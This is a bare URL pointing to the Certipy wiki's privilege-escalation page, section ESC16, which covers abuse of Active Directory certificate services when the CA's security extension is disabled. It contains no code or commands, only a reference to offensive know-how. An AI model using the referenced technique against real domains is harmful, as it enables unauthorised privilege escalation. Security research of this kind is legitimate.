https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally